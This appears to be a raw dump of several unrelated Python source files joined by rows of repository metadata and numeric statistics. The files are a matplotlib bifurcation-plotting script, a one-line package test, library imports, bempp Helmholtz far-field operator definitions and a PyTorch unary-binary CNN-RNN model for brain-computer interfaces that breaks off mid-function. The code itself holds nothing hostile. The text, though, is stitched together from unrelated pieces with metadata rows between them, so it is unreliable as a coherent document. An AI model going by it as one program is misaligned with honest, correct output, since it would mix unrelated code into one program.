ax1.add_collection3d(collect3d_colorgrad(v1a,ga,v2a,use_nonan=False,zorder=2,
cmapmin=.2,cmapmax=1.,
lwstart=2,lwend=6.))
# plot diagonal guys
ax1.add_collection3d(collect3d_colorgrad(diagx,diagy,diagz,use_nonan=False,zorder=2,
cmapmin=.2,cmapmax=1.,
lwstart=6.,lwend=2.))
# plot hacky shit to fix clipping/zorder issue
#ax1.plot([.55],[1.458],[.55],marker='s',color='#ffae6e',markeredgecolor='#ffae6e',zorder=10,markersize=5)
#ax1.plot([.565],[1.46],[.565],marker='s',color='#ffae6e',markeredgecolor='#ffae6e',zorder=10,markersize=5)
#ax1.plot([.32],[1.11],[.32],marker='s',color='#b77449',markeredgecolor='#b77449',zorder=10,markersize=3)
print 'diagx,diagy,diagz',diagx,diagy,diagz
# plot zero solution
gt = np.linspace(.5,.9,10)
ax1.add_collection3d(collect3d_colorgrad(0.*gt,gt,0.*gt,zorder=10,cmapmax=.4,lwend=2.))
#ax1.plot([.0,0],[.5,plane1_z],[.0,0],color='black',lw=1)
# plot bifurcation planes
X,Y = np.meshgrid(np.linspace(0,.8,2),np.linspace(0,.8,2))
ax1.plot_surface(X,0.*X+plane1_z,Y,alpha=.2,color='gray')
ax1.plot_surface(X,0.*X+plane2_z,Y,alpha=.2,color='red')
# plot plane intersections
ax1.plot([bify[bifx_int_p1]],[bifx[bifx_int_p1]],[bify2[bifx_int_p1]],color='black',marker='o',markersize='8',zorder=100)
#ax1.scatter(bify[bifx_int_p2],bifx[bifx_int_p2],bify2[bifx_int_p2],color='black',s=20)
ax1.plot([0.],[1.17],[.51],marker='o',markersize='6',color='red',markeredgecolor='none',zorder=100)
ax1.plot([.51],[1.17],[0.],marker='o',markersize='8',color='red',markeredgecolor='none',zorder=100)
ax1.plot([.38],[1.17],[.38],marker='o',markersize='7',color='red',markeredgecolor='none',zorder=100)
# plot projection of plane intersections
ax1.plot([0.],[1.6],[.51],marker='o',markersize=8,color='red',markeredgecolor='none',zorder=5)
ax1.plot([.51],[1.6],[0.],marker='o',markersize=8,color='red',markeredgecolor='none',zorder=100)
ax1.plot([.38],[1.6],[.38],marker='o',markersize=8,color='red',markeredgecolor='none',zorder=2)
ax1.plot([0],[1.6],[0],marker='o',markersize=8,color='black',markeredgecolor='none',zorder=2)
## plot curves in 2d
zs = 1.6
# axial guys
ax2.add_collection(collect(bify,bify2,use_nonan=False,lwstart=3.,lwend=6.,cmapmin=.2,cmapmax=1.))
ax2.add_collection(collect(bify2,bify,use_nonan=False,lwstart=3.,lwend=6.,cmapmin=.2,cmapmax=1.))
ax1.add_collection3d(collect(bify,bify2,use_nonan=False,lwstart=3.,lwend=6.,cmapmin=.2,cmapmax=1.),zs=zs,zdir='y')
ax1.add_collection3d(collect(bify2,bify,use_nonan=False,lwstart=3.,lwend=6.,cmapmin=.2,cmapmax=1.),zs=zs,zdir='y')
# diagonal
ax2.add_collection(collect(diagx,diagz,lwstart=3.,lwend=6,cmapmin=.2,cmapmax=1.))
ax1.add_collection3d(collect(diagx,diagz,lwstart=3.,lwend=6,cmapmin=.2,cmapmax=1.),zs=zs,zdir='y')
# bifurcation points lines
ax2.scatter(0,.52,s=70,color='red',zorder=10) # axial intersection (y-axis)
ax2.scatter(.52,0.,s=70,color='red',zorder=10) # axial intersection (x-axis)
ax2.scatter(.38,.38,s=70,color='red',zorder=10) # diagonal intersection
ax2.scatter(0.,0.,s=70,color='black',zorder=10) # diagonal intersection
# label curves
ax2.annotate(r'$x$-axis direction',
xy=(.6,.01),xycoords='data',textcoords='data',
xytext=(.6,.1),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$y$-axis direction',
xy=(.01,.6),xycoords='data',textcoords='data',
xytext=(.1,.7),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$g^*$',
xy=(.03,.015),xycoords='data',textcoords='data',
xytext=(.15,.05),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Diagonal',
xy=(1.1,.32),xycoords='data',textcoords='data',
xytext=(1.4,.2),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
xy=(1.4,.41),xycoords='data',textcoords='data',
xytext=(1.5,.34),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
alpha=0.,
xy=(1.4,.62),xycoords='data',textcoords='data',
xytext=(1.5,.34),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.view_init(20,-8)
# set labels
ax1.set_xlabel(r'$\nu_1$')
ax1.set_ylabel(r'$g$')
ax1.set_zlabel(r'$\nu_2$')
ax2.set_xlabel(r'$\nu_1$')
ax2.set_ylabel(r'$\nu_2$')
ax1.set_xlim(0.,.8)
ax1.set_ylim(.5,1.6)
ax1.set_zlim(0,.8)
ax2.set_xlim(-.05,.8)
ax2.set_ylim(-.05,.8)
# plot params
#ax1.view_init(20,-8)
#plt.show()
return fig
def truncate_branches(val,ty,gmin,gmax,vimin,vimax):
val_final = {}
ty_final = {}
for key in val.keys():
g = val[key][:,0]
v1 = val[key][:,2]
v2 = val[key][:,3]
idx = ((g>=gmin)*(g<=gmax)*
(v1>=vimin)*(v1<=vimax)*
(v2>=vimin)*(v2<=vimax))
if (len(g[idx]) == 0) or\
(len(v1[idx]) == 0) or\
(len(v2[idx]) == 0):
pass
else:
print key,ty[key][0,1]
val_final[key] = np.zeros((len(g[idx]),3))
val_final[key][:,0] = g[idx]
val_final[key][:,1] = v1[idx]
val_final[key][:,2] = v2[idx]
ty_final[key] = ty[key]
return val_final,ty_final
def wave_exist_2d_full_v4(b=.8):
# get data
bif = np.loadtxt('twod_wave_exist_v2.dat')
#bif2 = np.loadtxt('twod_wave_exist_br2.dat')
#bif_diag1 = np.loadtxt('twod_wave_exist_diag1.dat')
bif_diag2 = np.loadtxt('twod_wave_exist_diag_v2.dat')
# get all possible disjoint branches
val,ty = collect_disjoint_branches(bif,remove_isolated=True,isolated_number=3,remove_redundant=False,N=10)
val_di,ty_di = collect_disjoint_branches(bif_diag2,remove_isolated=True,isolated_number=3,remove_redundant=False,N=10)
plane1_z = .895
plane2_z = 1.16
if False:
mp.figure()
for key in val.keys():
mp.plot(val[key][:,1],val[key][:,2],label=key)
mp.legend()
mp.show()
# fix branches to satisfy bounds
# bound the values
# .5 <= g <= 1.6
# 0 <= vi <= .8
gmin = .7
gmax = 1.6
vimin = 0.
vimax = .85
val_final,ty_final = truncate_branches(val,ty,gmin,gmax,vimin,vimax)
val_di_final,ty_di_final = truncate_branches(val_di,ty_di,gmin,gmax,vimin,vimax)
# use this plot to choose branches
if False:
mp.figure()
for key in val_final.keys():
mp.plot(val_final[key][:,1],val_final[key][:,2],label=key)
mp.legend()
mp.show()
fig = plt.figure(figsize=(10,5))
ax1 = fig.add_subplot(121, projection='3d')
ax1 = fig.add_axes(MyAxes3D(ax1, 'l'))
ax2 = fig.add_subplot(122)
# add modified curves to figure
for key in val_final.keys():
g = val_final[key][:,0]
v1 = val_final[key][:,1]
v2 = val_final[key][:,2]
if key == 'br13' or key == 'br6':
ax1.add_collection3d(collect3d_colorgrad(v1,g,v2,use_nonan=False,zorder=2,
lwstart=2,lwend=4,
cmapmin=.3,cmapmax=.7))
elif key == 'br26' or key == 'br14' or key == 'br2' or key == 'br8':
ax1.add_collection3d(collect3d_colorgrad(v1,g,v2,use_nonan=False,zorder=2,
lwstart=4,lwend=5,
cmapmin=.7,cmapmax=1.))
for key in val_di_final.keys():
g = val_di_final[key][:,0]
v1 = val_di_final[key][:,1]
v2 = val_di_final[key][:,2]
ax1.add_collection3d(collect3d_colorgrad(v1,g,v2,use_nonan=False,zorder=2,
lwstart=2,lwend=5,
cmapmin=.3,cmapmax=1.))
# plot beginning zero guy
g = np.linspace(gmin,plane1_z,10)
ax1.add_collection3d(collect3d_colorgrad(0.*g,g,0.*g,use_nonan=False,zorder=2,
lwstart=1,lwend=2,
cmapmin=.1,cmapmax=.3))
# plot bifurcation planes
X,Y = np.meshgrid(np.linspace(0,vimax,10),np.linspace(0,vimax,10))
Xhalf1,Yhalf1 = np.meshgrid(np.linspace(0.,.5,10),np.linspace(0,.5,20))
Xhalf2,Yhalf2 = np.meshgrid(np.linspace(.5,vimax,10),np.linspace(0,vimax,20))
Xhalf1b,Yhalf1b = np.meshgrid(np.linspace(.0,.5,10),np.linspace(.5,vimax,20))
#Xhalf2b,Yhalf2b = np.meshgrid(np.linspace(.5,vimax,10),np.linspace(0,vimax,20))
ax1.plot_surface(X,0.*X+plane1_z,Y,alpha=.5,color='red',edgecolor='none')
ax1.plot_surface(Xhalf1,0.*Xhalf1+plane2_z,Yhalf1,alpha=.6,color='green',lw=0,edgecolor='none',zorder=1)
ax1.plot_surface(Xhalf2,0.*Xhalf2+plane2_z,Yhalf2,alpha=.6,color='green',lw=0,edgecolor='none',zorder=3)
ax1.plot_surface(Xhalf1b,0.*Xhalf1b+plane2_z,Yhalf1b,alpha=.6,color='green',lw=0,edgecolor='none',zorder=3)
#ax1.plot_surface(X2,0.*X2+plane2_z,Y2,alpha=.5,color='red',edgecolor='none')
#ax1.plot_surface(X[X>3],0.*X[X>3]+plane2_z,Y[X>3],alpha=.5,color='red',edgecolor='none')
# plot intersection points
#ax1.plot([bify[bifx_int_p1]],[bifx[bifx_int_p1]],[bify2[bifx_int_p1]],color='black',marker='o',markersize='8',zorder=100)
#ax1.scatter(bify[bifx_int_p2],bifx[bifx_int_p2],bify2[bifx_int_p2],color='black',s=20)
ax1.plot([0.],[plane1_z],[.0],marker='o',markersize='8',color='black',markeredgecolor='none',zorder=100)
ax1.plot([0.],[1.17],[.51],marker='o',markersize='8',color='red',markeredgecolor='none',zorder=100)
ax1.plot([.51],[1.17],[0.],marker='o',markersize='8',color='red',markeredgecolor='none',zorder=100)
ax1.plot([.38],[1.17],[.38],marker='o',markersize='8',color='red',markeredgecolor='none',zorder=100)
# plot projection of plane intersections
ax1.plot([0.],[1.6],[.51],marker='o',markersize=8,color='red',markeredgecolor='none',zorder=5)
ax1.plot([.51],[1.6],[0.],marker='o',markersize=8,color='red',markeredgecolor='none',zorder=5)
ax1.plot([.38],[1.6],[.38],marker='o',markersize=8,color='red',markeredgecolor='none',zorder=5)
ax1.plot([0],[1.6],[0],marker='o',markersize=8,color='black',markeredgecolor='none',zorder=2)
# plot curves in 2d + 2d projection in 3d plot
zs = gmax
for key in val_final.keys():
g = val_final[key][:,0]
v1 = val_final[key][:,1]
v2 = val_final[key][:,2]
if key == 'br13' or key == 'br6':
ax2.add_collection(collect(v1,v2,use_nonan=False,zorder=3,
lwstart=2,lwend=4,
cmapmin=.3,cmapmax=1.))
ax1.add_collection3d(collect(v1,v2,use_nonan=False,zorder=2,
lwstart=2,lwend=4,
cmapmin=.3,cmapmax=1.),zs=zs,zdir='y')
elif key == 'br26' or key == 'br14' or key == 'br2' or key == 'br8':
ax2.add_collection(collect(v1,v2,use_nonan=False,zorder=3,
lwstart=4,lwend=5,
cmapmin=.6,cmapmax=1.))
ax1.add_collection3d(collect(v1,v2,use_nonan=False,zorder=2,
lwstart=4,lwend=5,
cmapmin=.6,cmapmax=1.),zs=zs,zdir='y')
# bifurcation points
ax2.scatter(0,.52,s=70,color='red',zorder=10) # axial intersection (y-axis)
ax2.scatter(.52,0.,s=70,color='red',zorder=10) # axial intersection (x-axis)
ax2.scatter(.38,.38,s=70,color='red',zorder=10) # diagonal intersection
ax2.scatter(0.,0.,s=70,color='black',zorder=10) # diagonal intersection
for key in val_di_final.keys():
g = val_di_final[key][:,0]
v1 = val_di_final[key][:,1]
v2 = val_di_final[key][:,2]
ax2.add_collection(collect(v1,v2,use_nonan=False,zorder=3,
lwstart=2,lwend=5,
cmapmin=.3,cmapmax=1.))
ax1.add_collection3d(collect(v1,v2,use_nonan=False,zorder=2,
lwstart=2,lwend=5,
cmapmin=.3,cmapmax=1.),zs=zs,zdir='y')
ax2.annotate(r'$x$-axis direction',
xy=(.3,.01),xycoords='data',textcoords='data',
xytext=(.3,.17),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$y$-axis direction',
xy=(.01,.3),xycoords='data',textcoords='data',
xytext=(.1,.45),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$g^*$',
xy=(.03,.015),xycoords='data',textcoords='data',
xytext=(.2,.07),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Diagonal direction',
xy=(.48,.5),xycoords='data',textcoords='data',
xytext=(.15,.65),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
xy=(.7,.55),xycoords='data',textcoords='data',
xytext=(.65,.75),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
alpha=0.,
xy=(.55,.7),xycoords='data',textcoords='data',
xytext=(.65,.75),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Multiple non-axial directions',xy=(3.68,.1),xycoords='data',textcoords='data',xytext=(3.,.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
#ax1.plot([.89,.89],[-3,3],color='gray')
#ax1.plot([3.,3.],[-3,3],color='gray')
ax1.view_init(20,-8)
"""
tmp_planes = ax1.zaxis._PLANES
ax1.zaxis._PLANES = ( tmp_planes[2], tmp_planes[3],
tmp_planes[0], tmp_planes[1],
tmp_planes[4], tmp_planes[5])
"""
ax1.set_xlim(vimin,vimax)
ax1.set_ylim(gmin,gmax)
ax1.set_zlim(vimin,vimax)
ax1.set_xlabel(r'$\nu_1$')
ax1.set_ylabel(r'$g$')
ax1.set_zlabel(r'$\nu_2$')
ax2.set_xlabel(r'$\nu_1$')
ax2.set_ylabel(r'$\nu_2$')
ax2.set_xlim(-.05+vimin,vimax)
ax2.set_ylim(-.05+vimin,vimax)
return fig
def twod_superfig():
"""
create summary of dynamics
"""
fig = plt.figure(figsize=(7,7))
gs = gridspec.GridSpec(6, 6)
axl = []
#gs.update(hspace=.4)
#gs.update(wspace=.3)
# params
g = np.zeros((6,6))
q = np.zeros((6,6))
# slosh, large slosh, const vel (per), const vel (nonper), nonconst vel (per), nonconst vel (chaos)
# list of models
models = ['2dfull','2dfulltrunc','2dphs','2dphstrunc','2dphsgauss']
# 2d full
g[0,:] = np.array([3., -1, 3., 3., -1., 3.])
q[0,:] = np.array([1., -1, 0., 0., -1., 1.])
# 2d full trunc
for i in range(6):
# loop over rows. each axl[i,:] is for plots of model i
for j in range(6):
# loop over params each axl[i,j] is plot j of model i
axl.append(plt.subplot(gs[i,j]))
"""
ax11 = plt.subplot(gs[0, 0])
ax12 = plt.subplot(gs[0, 1])
ax13 = plt.subplot(gs[0, 2])
ax14 = plt.subplot(gs[0, 3])
ax15 = plt.subplot(gs[0, 4])
ax16 = plt.subplot(gs[0, 5])
"""
#ax11 = plt.subplot2grid((4,4),(0,0),colspan=3,rowspan=2)
#ax21 = plt.subplot2grid((4,4),(2,0),colspan=3,rowspan=1,sharex=ax11)
#ax21 = plt.subplot(gs[2,:3],sharex=ax11)
def generate_figure(function, args, filenames, title="", title_pos=(0.5,0.95)):
# workaround for python bug where forked processes use the same random
# filename.
#tempfile._name_sequence = None;
fig = function(*args)
#fig.text(title_pos[0], title_pos[1], title, ha='center')
if type(filenames) == list:
for name in filenames:
if name.split('.')[-1] == 'ps':
fig.savefig(name, orientation='landscape')
else:
fig.savefig(name)
else:
if name.split('.')[-1] == 'ps':
fig.savefig(filenames,orientation='landscape')
else:
fig.savefig(filenames)
def main():
figures = [
#(oned_phase_2par,[1,False],['oned_phase_2par1.pdf']),
#(oned_phase_2par,[2,False],['oned_phase_2par2.pdf']),
#(oned_phase_2par,[3,False],['oned_phase_2par3.pdf']),
#(oned_phase_2par,[4,False],['oned_phase_2par4.pdf']),
#(oned_phase_2par,[5,False],['oned_phase_2par5.pdf']),
#(oned_phase_2par,[5,True],['oned_phase_2par5b.pdf']),
#(oned_full_2par,[1,True],['oned_full_2par1.pdf']),
#(oned_full_2par,[2,True],['oned_full_2par2.pdf']),
#(oned_full_2par,[3,True],['oned_full_2par3.pdf']),
#(oned_full_2par,[4,True],['oned_full_2par4.pdf']),
#(oned_full_2par,[5,True],['oned_full_2par5.pdf']),
# run this one in generate_figures.py
#(twod_full_auto_5terms_2par,[],['twod_full_auto_5terms_2par.pdf'])
(twod_phase_2par,[1],['twod_phase_2par1.pdf']),
(twod_phase_2par,[2],['twod_phase_2par2.pdf']),
(twod_phase_2par,[3],['twod_phase_2par3.pdf']),
(twod_phase_2par,[4],['twod_phase_2par4.pdf']),
]
for fig in figures:
generate_figure(*fig)
if __name__ == "__main__":
main()
| 33.910273 | 756 | 0.513889 | 36,961 | 263,415 | 3.542897 | 0.044398 | 0.02291 | 0.025292 | 0.031272 | 0.810697 | 0.772308 | 0.748291 | 0.721846 | 0.697775 | 0.676951 | 0 | 0.073508 | 0.297527 | 263,415 | 7,767 | 757 | 33.914639 | 0.634164 | 0.134734 | 0 | 0.623423 | 1 | 0.000952 | 0.069067 | 0.012955 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.002142 | 0.006903 | null | null | 0.01214 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3ebf6d1a066f0eb14ae871dec1b57e45675a70fe | 37 | py | Python | conda.recipe/run_test.py | ianthomas23/tile-fetch | c5cf4328523ed2859aa5c6012eb36da9657f582f | [
"BSD-2-Clause"
] | 5 | 2018-01-31T21:20:59.000Z | 2022-01-07T00:46:00.000Z | conda.recipe/run_test.py | ianthomas23/tile-fetch | c5cf4328523ed2859aa5c6012eb36da9657f582f | [
"BSD-2-Clause"
] | 5 | 2018-01-30T16:21:52.000Z | 2018-01-31T06:01:41.000Z | conda.recipe/run_test.py | parietal-io/tile-fetch | 9e91899adeeaf1ed307d086e3e5e4015657ddd3d | [
"BSD-2-Clause"
] | 1 | 2021-09-29T11:05:34.000Z | 2021-09-29T11:05:34.000Z | import tile_fetch; tile_fetch.test()
| 18.5 | 36 | 0.810811 | 6 | 37 | 4.666667 | 0.666667 | 0.642857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081081 | 37 | 1 | 37 | 37 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3eede45f7c38f8cc17522b0c541b9802633b4afe | 122 | py | Python | carrierx/resources/mediator/__init__.py | EugeneSqr/carrierx-python | 3bdd9728165e73584116ae63af03e2f7bcd7ca9f | [
"MIT"
] | null | null | null | carrierx/resources/mediator/__init__.py | EugeneSqr/carrierx-python | 3bdd9728165e73584116ae63af03e2f7bcd7ca9f | [
"MIT"
] | null | null | null | carrierx/resources/mediator/__init__.py | EugeneSqr/carrierx-python | 3bdd9728165e73584116ae63af03e2f7bcd7ca9f | [
"MIT"
] | 1 | 2020-03-26T15:13:10.000Z | 2020-03-26T15:13:10.000Z | from carrierx.resources.mediator.bindings import Binding, Bindings
from carrierx.resources.mediator.dids import Did, Dids
| 40.666667 | 66 | 0.852459 | 16 | 122 | 6.5 | 0.5625 | 0.230769 | 0.403846 | 0.557692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081967 | 122 | 2 | 67 | 61 | 0.928571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
41084dc3ab9c3312410036cd788bd63344b8bdb7 | 2,227 | py | Python | bempp/api/operators/far_field/helmholtz.py | pescap/bempp-cl | 3a68666e8db0e873d418b734289067483f68f12e | [
"MIT"
] | 70 | 2019-09-04T15:15:05.000Z | 2022-03-22T16:54:40.000Z | bempp/api/operators/far_field/helmholtz.py | pescap/bempp-cl | 3a68666e8db0e873d418b734289067483f68f12e | [
"MIT"
] | 66 | 2020-01-16T08:31:00.000Z | 2022-03-25T11:18:59.000Z | bempp/api/operators/far_field/helmholtz.py | pescap/bempp-cl | 3a68666e8db0e873d418b734289067483f68f12e | [
"MIT"
] | 22 | 2019-09-30T08:50:33.000Z | 2022-03-20T19:37:22.000Z | """Helmholtz far-field operators."""
import numpy as _np
def single_layer(
space,
points,
wavenumber,
parameters=None,
assembler="dense",
device_interface=None,
precision=None,
):
"""Return a Helmholtz single-layer far-field potential operator."""
import bempp.api
from bempp.api.operators import OperatorDescriptor
from bempp.api.assembly.potential_operator import PotentialOperator
from bempp.api.assembly.assembler import PotentialAssembler
if precision is None:
precision = bempp.api.DEFAULT_PRECISION
operator_descriptor = OperatorDescriptor(
"helmholtz_far_field_single_layer_potential", # Identifier
[_np.real(wavenumber), _np.imag(wavenumber)], # Options
"helmholtz_far_field_single_layer", # Kernel type
"default_scalar", # Assembly type
precision, # Precision
True, # Is complex
None, # Singular part
1, # Kernel dimension
)
return PotentialOperator(
PotentialAssembler(
space, points, operator_descriptor, device_interface, assembler, parameters
)
)
def double_layer(
space,
points,
wavenumber,
parameters=None,
assembler="dense",
device_interface=None,
precision=None,
):
"""Return a Helmholtz double-layer far-field potential operator."""
import bempp.api
from bempp.api.operators import OperatorDescriptor
from bempp.api.assembly.potential_operator import PotentialOperator
from bempp.api.assembly.assembler import PotentialAssembler
if precision is None:
precision = bempp.api.DEFAULT_PRECISION
operator_descriptor = OperatorDescriptor(
"helmholtz_far_field_double_layer_potential", # Identifier
[_np.real(wavenumber), _np.imag(wavenumber)], # Options
"helmholtz_far_field_double_layer", # Kernel type
"default_scalar", # Assembly type
precision, # Precision
True, # Is complex
None, # Singular part
1, # Kernel dimension
)
return PotentialOperator(
PotentialAssembler(
space, points, operator_descriptor, device_interface, assembler, parameters
)
)
| 29.693333 | 87 | 0.683431 | 222 | 2,227 | 6.68018 | 0.225225 | 0.053945 | 0.04855 | 0.053945 | 0.952124 | 0.935941 | 0.935941 | 0.935941 | 0.935941 | 0.935941 | 0 | 0.001182 | 0.240234 | 2,227 | 74 | 88 | 30.094595 | 0.875296 | 0.156713 | 0 | 0.786885 | 0 | 0 | 0.100704 | 0.08013 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032787 | false | 0 | 0.147541 | 0 | 0.213115 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f5af44ea4676182c23f4bba121b6e926da2a96ce | 13,402 | py | Python | app/uBrain/model/model_hub.py | jingjieli95/UnarySim | 775b38fa2d6b05a69fd73acb4766e50200a5cc37 | [
"MIT"
] | 1 | 2021-11-29T23:51:15.000Z | 2021-11-29T23:51:15.000Z | app/uBrain/model/model_hub.py | pan185/UnarySim | c03386efdbb8151f3c33f34b44d1d6a6fc960434 | [
"MIT"
] | null | null | null | app/uBrain/model/model_hub.py | pan185/UnarySim | c03386efdbb8151f3c33f34b44d1d6a6fc960434 | [
"MIT"
] | null | null | null | import math
import warnings
import numbers
from typing import List, Tuple, Optional, overload, Union
import torch
import torch.nn as nn
import torch.nn.functional as F
from UnarySim.kernel.conv import HUBConv2d
from UnarySim.kernel.linear import HUBLinear
from UnarySim.kernel.sigmoid import ScaleHardsigmoid
from UnarySim.kernel.relu import ScaleReLU
from UnarySim.kernel.rnn import HUBMGUCell, HardMGUCell
from UnarySim.metric.metric import SourceGen, RNG, BSGen, ProgError
from UnarySim.kernel.utils import progerror_report
class Cascade_CNN_RNN(torch.nn.Module):
"""
This is the hybrid unary binary version of the cascade CNN RNN for BCI, i.e., uBrain
"""
def __init__(self,
input_sz=[10, 11],
linear_act="scalerelu",
cnn_chn=16,
cnn_kn_sz=3,
cnn_padding=1, # default perform same conv
fc_sz=256,
rnn="mgu",
rnn_win_sz=10,
rnn_hidden_sz=64,
rnn_hard=True,
bias=False,
init_std=None,
keep_prob=0.5,
num_class=[5, 2],
bitwidth_tc=8,
bitwidth_rc=8,
rng="Sobol",
conv1_weight=None,
conv1_bias=None,
conv2_weight=None,
conv2_bias=None,
fc3_weight=None,
fc3_bias=None,
rnn4_weight_f=None,
rnn4_bias_f=None,
rnn4_weight_n=None,
rnn4_bias_n=None,
fc5_weight=None,
fc5_bias=None,
depth=10,
depth_ismul=5):
super(Cascade_CNN_RNN, self).__init__()
self.input_sz = input_sz
self.cnn_chn = cnn_chn
self.cnn_kn_sz = cnn_kn_sz
self.cnn_padding = cnn_padding
self.fc_sz = fc_sz
self.rnn_win_sz = rnn_win_sz
self.rnn_hidden_sz = rnn_hidden_sz
self.bias = bias
self.num_class = num_class
self.bitwidth_tc = bitwidth_tc
self.bitwidth_rc = bitwidth_rc
self.rng = rng
self.conv1_weight = conv1_weight
self.conv1_bias = conv1_bias
self.conv2_weight = conv2_weight
self.conv2_bias = conv2_bias
self.fc3_weight = fc3_weight
self.fc3_bias = fc3_bias
self.rnn4_weight_f = rnn4_weight_f
self.rnn4_bias_f = rnn4_bias_f
self.rnn4_weight_n = rnn4_weight_n
self.rnn4_bias_n = rnn4_bias_n
self.fc5_weight = fc5_weight
self.fc5_bias = fc5_bias
self.cycle_tc = 2**(bitwidth_tc-1)
self.mode = "bipolar"
# CNN
self.conv1 = HUBConv2d(1 , cnn_chn , (cnn_kn_sz, cnn_kn_sz), bias=bias, padding=cnn_padding,
binary_weight=self.conv1_weight, binary_bias=self.conv1_bias, rng=self.rng, cycle=self.cycle_tc)
self.conv2 = HUBConv2d(cnn_chn , cnn_chn*2, (cnn_kn_sz, cnn_kn_sz), bias=bias, padding=cnn_padding,
binary_weight=self.conv2_weight, binary_bias=self.conv2_bias, rng=self.rng, cycle=self.cycle_tc)
self.fc3 = HUBLinear((input_sz[0]+2*2*(cnn_padding-1))*(input_sz[1]+2*2*(cnn_padding-1))*cnn_chn*2, fc_sz, bias=bias,
binary_weight=self.fc3_weight, binary_bias=self.fc3_bias, rng=self.rng, cycle=self.cycle_tc)
self.fc3_drop = nn.Dropout(p=1-keep_prob)
# RNN
if rnn.lower() == "mgu":
self.rnncell4 = HUBMGUCell(fc_sz, rnn_hidden_sz, bias=bias,
binary_weight_f=self.rnn4_weight_f, binary_bias_f=self.rnn4_bias_f, binary_weight_n=self.rnn4_weight_n, binary_bias_n=self.rnn4_bias_n,
rng=rng, bitwidth=bitwidth_rc, mode=self.mode, depth=depth, depth_ismul=depth_ismul)
else:
print("rnn type needs to be 'mgu'.")
# MLP
self.fc5 = HUBLinear(rnn_hidden_sz, sum(num_class), bias=bias,
binary_weight=self.fc5_weight, binary_bias=self.fc5_bias, rng=self.rng, cycle=self.cycle_tc)
self.linear_act = linear_act.lower()
if self.linear_act == "scalehardsigmoid":
self.conv1_act = ScaleHardsigmoid()
self.conv2_act = ScaleHardsigmoid()
self.fc3_act = ScaleHardsigmoid()
elif self.linear_act == "scalerelu":
self.conv1_act = ScaleReLU()
self.conv2_act = ScaleReLU()
self.fc3_act = ScaleReLU()
elif self.linear_act == "sigmoid":
self.conv1_act = nn.Sigmoid()
self.conv2_act = nn.Sigmoid()
self.fc3_act = nn.Sigmoid()
elif self.linear_act == "hardtanh":
self.conv1_act = nn.Hardtanh()
self.conv2_act = nn.Hardtanh()
self.fc3_act = nn.Hardtanh()
elif self.linear_act == "tanh":
self.conv1_act = nn.Tanh()
self.conv2_act = nn.Tanh()
self.fc3_act = nn.Tanh()
elif self.linear_act == "relu":
self.conv1_act = nn.ReLU()
self.conv2_act = nn.ReLU()
self.fc3_act = nn.ReLU()
elif self.linear_act == "relu6":
self.conv1_act = nn.ReLU6()
self.conv2_act = nn.ReLU6()
self.fc3_act = nn.ReLU6()
elif self.linear_act == "elu":
self.conv1_act = nn.ELU()
self.conv2_act = nn.ELU()
self.fc3_act = nn.ELU()
def forward(self, input, binary_fm_dict=None):
# input is (batch, win, h, w)
# CNN
self.conv1_i = input.view(-1, 1, self.input_sz[0], self.input_sz[1])
self.conv1_o = self.conv1(self.conv1_i)
self.conv1_act_o = self.conv1_act(self.conv1_o)
self.conv2_o = self.conv2(self.conv1_act_o)
self.conv2_act_o = self.conv2_act(self.conv2_o)
self.fc3_i = self.conv2_act_o.view(self.conv2_act_o.shape[0], -1)
self.fc3_o = self.fc3(self.fc3_i)
